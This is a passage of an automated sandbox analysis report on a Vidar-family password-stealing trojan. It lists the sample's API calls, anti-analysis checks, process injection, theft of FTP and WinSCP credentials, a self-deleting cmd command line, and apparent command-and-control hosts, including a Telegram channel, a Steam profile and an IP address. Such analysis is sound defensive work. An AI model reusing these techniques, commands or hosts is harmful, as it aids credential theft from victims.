          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Steam.37477.6298.10622.exeCode function: 0_2_002FC2E0 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,StrCmpCA,DeleteFileA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_002FC2E0
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Steam.37477.6298.10622.exeCode function: 0_2_002FA2C0 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,0_2_002FA2C0
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Steam.37477.6298.10622.exeCode function: 0_2_003056C0 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose,0_2_003056C0
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Steam.37477.6298.10622.exeCode function: 0_2_00304F80 wsprintfA,FindFirstFileA,memset,memset,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,memset,lstrcat,strtok_s,strtok_s,memset,lstrcat,strtok_s,PathMatchSpecA,DeleteFileA,CopyFileA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,DeleteFileA,strtok_s,FindNextFileA,FindClose,0_2_00304F80
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Steam.37477.6298.10622.exeCode function: 0_2_002FB390 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_002FB390
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Steam.37477.6298.10622.exeCode function: 0_2_003053C0 GetLogicalDriveStringsA,memset,GetDriveTypeA,lstrcpy,lstrcpy,lstrcpy,lstrlen,0_2_003053C0
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Steam.37477.6298.10622.exeCode function: 0_2_002FFDA0 GetSystemInfo,wsprintfA,0_2_002FFDA0
          Source: SecuriteInfo.com.Trojan.PWS.Steam.37477.6298.10622.exe, 00000000.00000002.2694769785.0000000002F9E000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Trojan.PWS.Steam.37477.6298.10622.exe, 00000000.00000002.2694769785.0000000002F2E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
          Source: SecuriteInfo.com.Trojan.PWS.Steam.37477.6298.10622.exe, 00000000.00000002.2694769785.0000000002F2E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMwareVMware
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Steam.37477.6298.10622.exeAPI call chain: ExitProcess graph end nodegraph_0-16161
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Steam.37477.6298.10622.exeProcess information queried: ProcessInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Steam.37477.6298.10622.exeCode function: 0_2_0030D12F IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_0030D12F
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Steam.37477.6298.10622.exeCode function: 0_2_002F2000 VirtualProtect 00000000,00000004,00000100,?0_2_002F2000
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Steam.37477.6298.10622.exeCode function: 0_2_00307A40 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,0_2_00307A40
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Steam.37477.6298.10622.exeCode function: 0_2_003076E0 mov eax, dword ptr fs:[00000030h]0_2_003076E0
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Steam.37477.6298.10622.exeCode function: 0_2_00300420 GetWindowsDirectoryA,GetVolumeInformationA,GetProcessHeap,RtlAllocateHeap,wsprintfA,lstrcat,GetCurrentHwProfileA,lstrlen,lstrcat,0_2_00300420
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Steam.37477.6298.10622.exeCode function: 0_2_0030ECC8 SetUnhandledExceptionFilter,0_2_0030ECC8
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Steam.37477.6298.10622.exeCode function: 0_2_0030D12F IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_0030D12F
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Steam.37477.6298.10622.exeCode function: 0_2_0030CAF5 memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_0030CAF5
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Steam.37477.6298.10622.exeMemory protected: page guardJump to behavior

          HIPS / PFW / Operating System Protection Evasion

          barindex
          Yara detected Powershell download and execute
          Source: Yara matchFile source: Process Memory Space: SecuriteInfo.com.Trojan.PWS.Steam.37477.6298.10622.exe PID: 6924, type: MEMORYSTR
          Contains functionality to inject code into remote processes
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Steam.37477.6298.10622.exeCode function: 0_2_002FED80 memset,CreateProcessA,VirtualAlloc,GetThreadContext,ReadProcessMemory,VirtualAllocEx,ResumeThread,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,SetThreadContext,ResumeThread,0_2_002FED80
          Searches for specific processes (likely to inject)
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Steam.37477.6298.10622.exeCode function: 0_2_00301400 CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,CloseHandle,0_2_00301400
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Steam.37477.6298.10622.exeCode function: 0_2_003012F0 CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,CloseHandle,0_2_003012F0
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Steam.37477.6298.10622.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c timeout /t 10 & del /f /q "C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Steam.37477.6298.10622.exe" & rd /s /q "C:\ProgramData\AEGHIJEHJDHI" & exitJump to behavior
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe timeout /t 10Jump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Steam.37477.6298.10622.exeCode function: 0_2_002F1000 cpuid 0_2_002F1000
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Steam.37477.6298.10622.exeCode function: GetKeyboardLayoutList,LocalAlloc,GetKeyboardLayoutList,GetLocaleInfoA,LocalFree,0_2_002FFC30
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Steam.37477.6298.10622.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Steam.37477.6298.10622.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Steam.37477.6298.10622.exeQueries volume information: C:\ VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Steam.37477.6298.10622.exeQueries volume information: C:\ VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Steam.37477.6298.10622.exeCode function: 0_2_0030A440 GetLocalTime,SystemTimeToFileTime,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,0_2_0030A440
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Steam.37477.6298.10622.exeCode function: 0_2_002FFAE0 GetProcessHeap,RtlAllocateHeap,GetUserNameA,0_2_002FFAE0
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Steam.37477.6298.10622.exeCode function: 0_2_002FFBC0 GetProcessHeap,RtlAllocateHeap,GetTimeZoneInformation,wsprintfA,0_2_002FFBC0
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Steam.37477.6298.10622.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
          Source: SecuriteInfo.com.Trojan.PWS.Steam.37477.6298.10622.exe, 00000000.00000002.2694769785.0000000003007000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Steam.37477.6298.10622.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * From AntiVirusProduct

          Stealing of Sensitive Information

          barindex
          Yara detected Vidar stealer
          Source: Yara matchFile source: 0.2.SecuriteInfo.com.Trojan.PWS.Steam.37477.6298.10622.exe.2f0000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000000.00000002.2693911043.00000000002F1000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
          Source: Yara matchFile source: Process Memory Space: SecuriteInfo.com.Trojan.PWS.Steam.37477.6298.10622.exe PID: 6924, type: MEMORYSTR
          Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Steam.37477.6298.10622.exeKey opened: HKEY_CURRENT_USER\Software\Martin Prikryl\WinSCP 2\ConfigurationJump to behavior
          Tries to harvest and steal ftp login credentials
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Steam.37477.6298.10622.exeFile opened: C:\Users\user\AppData\Roaming\FileZilla\recentservers.xmlJump to behavior

          Remote Access Functionality

          barindex
          Yara detected Vidar stealer
          Source: Yara matchFile source: 0.2.SecuriteInfo.com.Trojan.PWS.Steam.37477.6298.10622.exe.2f0000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000000.00000002.2693911043.00000000002F1000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
          Source: Yara matchFile source: Process Memory Space: SecuriteInfo.com.Trojan.PWS.Steam.37477.6298.10622.exe PID: 6924, type: MEMORYSTR

          Mitre Att&ck Matrix

          ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
          Gather Victim Identity InformationAcquire InfrastructureValid Accounts1
          Windows Management Instrumentation          		1
          DLL Side-Loading          		1
          DLL Side-Loading          		11
          Disable or Modify Tools          		1
          OS Credential Dumping          		2
          System Time Discovery          		Remote Services1
          Archive Collected Data          		2
          Ingress Tool Transfer          		Exfiltration Over Other Network MediumAbuse Accessibility Features
          CredentialsDomainsDefault Accounts1
          Native API          		Boot or Logon Initialization Scripts211
          Process Injection          		1
          Deobfuscate/Decode Files or Information          		1
          Credentials in Registry          		1
          Account Discovery          		Remote Desktop Protocol1
          Data from Local System          		21
          Encrypted Channel          		Exfiltration Over BluetoothNetwork Denial of Service
          Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)21
          Obfuscated Files or Information          		Security Account Manager3
          File and Directory Discovery          		SMB/Windows Admin SharesData from Network Shared Drive2
          Non-Application Layer Protocol          		Automated ExfiltrationData Encrypted for Impact
          Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook1
          Software Packing          		NTDS45
          System Information Discovery          		Distributed Component Object ModelInput Capture13
          Application Layer Protocol          		Traffic DuplicationData Destruction
          Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
          DLL Side-Loading          		LSA Secrets41
          Security Software Discovery          		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
          Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
          File Deletion          		Cached Domain Credentials1
          Virtualization/Sandbox Evasion          		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
          DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
          Masquerading          		DCSync12
          Process Discovery          		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
          Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job1
          Virtualization/Sandbox Evasion          		Proc Filesystem1
          System Owner/User Discovery          		Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
          Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt211
          Process Injection          		/etc/passwd and /etc/shadowNetwork SniffingDirect Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement

          Behavior Graph

          Hide Legend

          Legend:

          • Process
          • Signature
          • Created File
          • DNS/IP Info
          • Is Dropped
          • Is Windows Process
          • Number of created Registry Values
          • Number of created Files
          • Visual Basic
          • Delphi
          • Java
          • .Net C# or VB.NET
          • C, C++ or other language
          • Is malicious
          • Internet

          Screenshots

          Thumbnails

          This section contains all screenshots as thumbnails, including those not shown in the slideshow.


          windows-stand

          Antivirus, Machine Learning and Genetic Malware Detection

          Initial Sample

          SourceDetectionScannerLabelLink
          SecuriteInfo.com.Trojan.PWS.Steam.37477.6298.10622.exe63%ReversingLabsWin32.Trojan.Vidar
          SecuriteInfo.com.Trojan.PWS.Steam.37477.6298.10622.exe69%VirustotalBrowse
          SecuriteInfo.com.Trojan.PWS.Steam.37477.6298.10622.exe100%Joe Sandbox ML

          Dropped Files

          No Antivirus matches

          Unpacked PE Files

          No Antivirus matches

          Domains

          SourceDetectionScannerLabelLink
          steamcommunity.com0%VirustotalBrowse
          t.me0%VirustotalBrowse
          arpdabl.zapto.org12%VirustotalBrowse

          URLs

          SourceDetectionScannerLabelLink
          https://community.akamai.steamstatic.com/public/shared/css/shared_responsive.css?v=sHIIcMzCffX6&0%URL Reputationsafe
          https://steamcommunity.com/?subsection=broadcasts0%Avira URL Cloudsafe
          https://store.steampowered.com/subscriber_agreement/0%Avira URL Cloudsafe
          https://store.steampowered.c0%Avira URL Cloudsafe
          https://community.akamai.steamstatic.com/public/shared/javascript/shared_global.js?v=REEGJU1hwkYl&am0%URL Reputationsafe
          https://community.akamai.steamstatic.com/public/css/globalv2.css?v=PAcV2zMBzzSV&l=english0%URL Reputationsafe
          https://player.vimeo.com0%Avira URL Cloudsafe
          http://arpdabl.zapto.org/s0%Avira URL Cloudsafe
          https://community.akamai.steamstatic.com/public/css/skin_1/profilev2.css?v=M_qL4gO2sKII&l=englis0%URL Reputationsafe
          https://community.akamai.steamstatic.com/public/javascript/global.js?v=9OzcxMXbaV84&l=english0%URL Reputationsafe
          https://steamcommunity.com/?subsection=broadcasts0%VirustotalBrowse
          https://player.vimeo.com0%VirustotalBrowse
          https://www.gstatic.cn/recaptcha/0%Avira URL Cloudsafe
          https://steamcommunity.com/profiles/76561199747278259r0%Avira URL Cloudsafe
          https://community.akamai.steamstatic.com/public/javascript/reportedcontent.js?v=dAtjbcZMWhSe&l=e0%URL Reputationsafe
          https://community.akamai.steamstatic.com/public/javascript/applications/community/libraries~b28b7af60%Avira URL Cloudsafe
          https://recaptcha.net0%URL Reputationsafe
          https://store.steampowered.com/subscriber_agreement/0%VirustotalBrowse
          https://t.me/armad2a40%Avira URL Cloudsafe
          https://telegram.org/img/t_logo_2x.png0%Avira URL Cloudsafe
          http://arpdabl.zapto.org/s12%VirustotalBrowse
          http://www.valvesoftware.com/legal.htm0%Avira URL Cloudsafe
          http://www.valvesoftware.com/legal.htm0%VirustotalBrowse
          https://telegram.org/img/t_logo_2x.png0%VirustotalBrowse
          https://www.youtube.com0%Avira URL Cloudsafe
          https://community.akamai.steamstatic.com/public/css/promo/summer2017/stickers.css?v=HA2Yr5oy3FFG&amp0%Avira URL Cloudsafe
          https://community.akamai.steamstatic.com/public/shared/images/responsive/logo_valve_footer.png0%Avira URL Cloudsafe
          https://www.valvesoftware.com/en/contact?contact-person=Translation%20Team%20Feedback0%VirustotalBrowse
          https://community.akamai.steamstatic.com/public/shared/images/responsive/logo_valve_footer.png0%VirustotalBrowse
          https://www.google.com0%VirustotalBrowse
          https://community.akamai.steamstatic.com/public/css/promo/summer2017/stickers.css?v=HA2Yr5oy3FFG&amp0%VirustotalBrowse
          https://www.youtube.com0%VirustotalBrowse
          https://www.gstatic.cn/recaptcha/0%VirustotalBrowse
          https://community.akamai.steamstatic.com/public/javascript/applications/community/libraries~b28b7af60%VirustotalBrowse
          https://community.akamai.steamstatic.com/public/shared/images/responsive/header_menu_hamburger.png0%Avira URL Cloudsafe
          https://www.google.com0%Avira URL Cloudsafe
          https://steamcommunity.com/profiles/76561199747278259/badges100%Avira URL Cloudmalware
          https://www.valvesoftware.com/en/contact?contact-person=Translation%20Team%20Feedback0%Avira URL Cloudsafe
          https://188.245.87.202/0%Avira URL Cloudsafe
          https://community.akamai.steamstatic.com/public/javascript/scriptaculous/_combined.js?v=OeNIgrpEF8tL0%Avira URL Cloudsafe
          https://s.ytimg.com;0%Avira URL Cloudsafe
          http://arpdabl.zapto.org/n0%Avira URL Cloudsafe
          https://steam.tv/0%Avira URL Cloudsafe
          https://188.245.87.202/16%VirustotalBrowse
          https://steamcommunity.com/profiles/76561199747278259/badges0%VirustotalBrowse
          https://community.akamai.steamstatic.com/public/javascript/scriptaculous/_combined.js?v=OeNIgrpEF8tL0%VirustotalBrowse
          https://community.akamai.steamstatic.com/public/javascript/applications/community/manifest.js?v=WRaH0%Avira URL Cloudsafe
          https://community.akamai.steamstatic.com/public/css/skin_1/header.css?v=NFoCa4OkAxRb&l=english0%Avira URL Cloudsafe
          https://steam.tv/0%VirustotalBrowse
          https://t.me/armad2a100%Avira URL Cloudmalware
          https://community.akamai.steamstatic.com/public/shared/images/responsive/header_menu_hamburger.png0%VirustotalBrowse
          http://store.steampowered.com/privacy_agreement/0%Avira URL Cloudsafe
          https://community.akamai.steamstatic.com/public/css/skin_1/header.css?v=NFoCa4OkAxRb&l=english0%VirustotalBrowse
          https://store.steampowered.com/points/shop/0%Avira URL Cloudsafe
          http://arpdabl.zapto.org38.1490%Avira URL Cloudsafe
          https://t.me/armad2a3%VirustotalBrowse
          https://steamcommunity.com/profiles/76561199747278259gi_z2Mozilla/5.00%Avira URL Cloudsafe
          https://community.akamai.steamstatic.com/public/javascript/applications/community/manifest.js?v=WRaH0%VirustotalBrowse
          http://store.steampowered.com/privacy_agreement/0%VirustotalBrowse
          https://sketchfab.com0%Avira URL Cloudsafe
          https://www.youtube.com/0%Avira URL Cloudsafe
          https://lv.queniujq.cn0%Avira URL Cloudsafe
          https://avatars.akamai.steamstatic.com/fef49e7fa7e1997310d705b2a6158ff8dc1cdfeb_full.jpg0%Avira URL Cloudsafe
          https://store.steampowered.com/privacy_agreement/0%Avira URL Cloudsafe
          https://steamcommunity.com/profiles/76561199747278259gi_z2Mozilla/5.00%VirustotalBrowse
          https://store.steampowered.com/points/shop/0%VirustotalBrowse
          https://community.akamai.steamstatic.com/public/shared/css/shared_global.css?v=QI-9YLc_mdtk&l=en0%Avira URL Cloudsafe
          https://avatars.akamai.steamstatic.com/fef49e7fa7e1997310d705b2a6158ff8dc1cdfeb_full.jpg0%VirustotalBrowse
          https://sketchfab.com0%VirustotalBrowse
          https://lv.queniujq.cn0%VirustotalBrowse
          https://community.akamai.steamstatic.com/public/shared/javascript/tooltip.js?v=.zYHOpI1L3Rt00%Avira URL Cloudsafe
          https://steamcommunity.com/profiles/76561199747278259100%Avira URL Cloudmalware
          https://community.akamai.steamstatic.com/public/javascript/applications/community/main.js?v=puGcKUBV0%Avira URL Cloudsafe
          https://www.google.com/recaptcha/0%Avira URL Cloudsafe
          https://checkout.steampowered.com/0%Avira URL Cloudsafe
          https://188.245.87.202/rosoft0%Avira URL Cloudsafe
          https://steamcommunity.com/profiles/76561199747278259ex0%Avira URL Cloudsafe
          http://arpdabl.zapto.org0%Avira URL Cloudsafe
          https://community.akamai.steamstatic.com/public/javascript/modalv2.js?v=dfMhuy-Lrpyo&l=english0%Avira URL Cloudsafe
          https://www.youtube.com/0%VirustotalBrowse
          https://community.akamai.steamstatic.com/public/shared/images/responsive/header_logo.png0%Avira URL Cloudsafe
          https://188.245.87.202/00%Avira URL Cloudsafe
          https://community.akamai.steamstatic.com/public/javascript/jquery-1.11.1.min.js?v=.isFTSRckeNhC0%Avira URL Cloudsafe
          https://store.steampowered.com/;0%Avira URL Cloudsafe
          https://store.steampowered.com/about/0%Avira URL Cloudsafe
          https://steamcommunity.com/my/wishlist/0%Avira URL Cloudsafe
          https://t.me/0%Avira URL Cloudsafe
          https://188.245.87.202/T0%Avira URL Cloudsafe
          https://web.telegram.org0%Avira URL Cloudsafe
          https://t.me/armad2ahellosqls.dllsqlite3.dllIn0%Avira URL Cloudsafe
          https://help.steampowered.com/en/0%Avira URL Cloudsafe
          https://cdn.akamai.steamstatic.com/steamcommunity/public/assets/0%Avira URL Cloudsafe
          https://steamcommunity.com/market/0%Avira URL Cloudsafe
          https://store.steampowered.com/news/0%Avira URL Cloudsafe
          https://community.akamai.steamstatic.com/0%Avira URL Cloudsafe
          http://arpdabl.zapto..5938.1490%Avira URL Cloudsafe
          http://store.steampowered.com/subscriber_agreement/0%Avira URL Cloudsafe
          https://steamcommunity.com/linkfilter/?u=http%3A%2F%2Fwww.geonames.org0%Avira URL Cloudsafe
          https://steamcommunity.com/profiles/76561199747278259/inventory/100%Avira URL Cloudmalware
          https://recaptcha.net/recaptcha/;0%Avira URL Cloudsafe

          Domains and IPs

          Contacted Domains

          NameIPActiveMaliciousAntivirus DetectionReputation
          steamcommunity.com
          		23.50.98.133
          		truetrueunknown
          t.me
          		149.154.167.99
          		truefalseunknown
          arpdabl.zapto.org
          		0.0.0.0
          		truefalseunknown

          Contacted URLs

          NameMaliciousAntivirus DetectionReputation
          https://t.me/armad2afalse
          • 3%, Virustotal, Browse
          • Avira URL Cloud: malware
          		unknown
          https://steamcommunity.com/profiles/76561199747278259true
          • Avira URL Cloud: malware
          		unknown

          URLs from Memory and Binaries

          NameSourceMaliciousAntivirus DetectionReputation
          https://player.vimeo.comSecuriteInfo.com.Trojan.PWS.Steam.37477.6298.10622.exe, 00000000.00000003.2605340851.0000000002FB1000.00000004.00000020.00020000.00000000.sdmpfalse
          • 0%, Virustotal, Browse
          • Avira URL Cloud: safe
          		unknown
          https://store.steampowered.cSecuriteInfo.com.Trojan.PWS.Steam.37477.6298.10622.exe, 00000000.00000002.2693911043.000000000033E000.00000040.00000001.01000000.00000003.sdmpfalse
          • Avira URL Cloud: safe
          		unknown
          https://steamcommunity.com/?subsection=broadcastsSecuriteInfo.com.Trojan.PWS.Steam.37477.6298.10622.exe, 00000000.00000002.2694769785.0000000002FEB000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Trojan.PWS.Steam.37477.6298.10622.exe, 00000000.00000002.2693911043.000000000033E000.00000040.00000001.01000000.00000003.sdmp, SecuriteInfo.com.Trojan.PWS.Steam.37477.6298.10622.exe, 00000000.00000003.2682790694.0000000002FEB000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Trojan.PWS.Steam.37477.6298.10622.exe, 00000000.00000003.2682790694.0000000002FA3000.00000004.00000020.00020000.00000000.sdmp, 76561199747278259[1].htm.0.drfalse
          • 0%, Virustotal, Browse
          • Avira URL Cloud: safe
          		unknown
          http://arpdabl.zapto.org/sSecuriteInfo.com.Trojan.PWS.Steam.37477.6298.10622.exe, 00000000.00000002.2694769785.0000000002FA5000.00000004.00000020.00020000.00000000.sdmptrue
          • 12%, Virustotal, Browse
          • Avira URL Cloud: safe
          		unknown
          https://store.steampowered.com/subscriber_agreement/SecuriteInfo.com.Trojan.PWS.Steam.37477.6298.10622.exe, 00000000.00000002.2694769785.0000000002FEB000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Trojan.PWS.Steam.37477.6298.10622.exe, 00000000.00000002.2693911043.000000000033E000.00000040.00000001.01000000.00000003.sdmp, SecuriteInfo.com.Trojan.PWS.Steam.37477.6298.10622.exe, 00000000.00000003.2682790694.0000000002FEB000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Trojan.PWS.Steam.37477.6298.10622.exe, 00000000.00000003.2682790694.0000000002FA3000.00000004.00000020.00020000.00000000.sdmp, 76561199747278259[1].htm.0.drfalse
          • 0%, Virustotal, Browse
          • Avira URL Cloud: safe
          		unknown
          https://www.gstatic.cn/recaptcha/SecuriteInfo.com.Trojan.PWS.Steam.37477.6298.10622.exe, 00000000.00000003.2605340851.0000000002FB1000.00000004.00000020.00020000.00000000.sdmpfalse
          • 0%, Virustotal, Browse
          • Avira URL Cloud: safe
          		unknown
          https://steamcommunity.com/profiles/76561199747278259rSecuriteInfo.com.Trojan.PWS.Steam.37477.6298.10622.exe, 00000000.00000003.2682790694.0000000002FAB000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Trojan.PWS.Steam.37477.6298.10622.exe, 00000000.00000002.2694769785.0000000002FA5000.00000004.00000020.00020000.00000000.sdmpfalse
          • Avira URL Cloud: safe
          		unknown
          https://community.akamai.steamstatic.com/public/javascript/applications/community/libraries~b28b7af6SecuriteInfo.com.Trojan.PWS.Steam.37477.6298.10622.exe, 00000000.00000002.2694769785.0000000002FEB000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Trojan.PWS.Steam.37477.6298.10622.exe, 00000000.00000002.2693911043.000000000033E000.00000040.00000001.01000000.00000003.sdmp, SecuriteInfo.com.Trojan.PWS.Steam.37477.6298.10622.exe, 00000000.00000003.2682790694.0000000002FEB000.00000004.00000020.00020000.00000000.sdmp, 76561199747278259[1].htm.0.drfalse
          • 0%, Virustotal, Browse
          • Avira URL Cloud: safe
          		unknown
          https://t.me/armad2a4SecuriteInfo.com.Trojan.PWS.Steam.37477.6298.10622.exe, 00000000.00000003.2682790694.0000000002FAB000.00000004.00000020.00020000.00000000.sdmpfalse
          • Avira URL Cloud: safe
          		unknown
          https://telegram.org/img/t_logo_2x.pngSecuriteInfo.com.Trojan.PWS.Steam.37477.6298.10622.exe, 00000000.00000003.2682790694.0000000002FA3000.00000004.00000020.00020000.00000000.sdmpfalse
          • 0%, Virustotal, Browse
          • Avira URL Cloud: safe
          		unknown
          http://www.valvesoftware.com/legal.htmSecuriteInfo.com.Trojan.PWS.Steam.37477.6298.10622.exe, 00000000.00000002.2694769785.0000000002FEB000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Trojan.PWS.Steam.37477.6298.10622.exe, 00000000.00000002.2693911043.000000000033E000.00000040.00000001.01000000.00000003.sdmp, SecuriteInfo.com.Trojan.PWS.Steam.37477.6298.10622.exe, 00000000.00000003.2682790694.0000000002FEB000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Trojan.PWS.Steam.37477.6298.10622.exe, 00000000.00000003.2682790694.0000000002FA3000.00000004.00000020.00020000.00000000.sdmp, 76561199747278259[1].htm.0.drfalse
          • 0%, Virustotal, Browse
          • Avira URL Cloud: safe
          		unknown
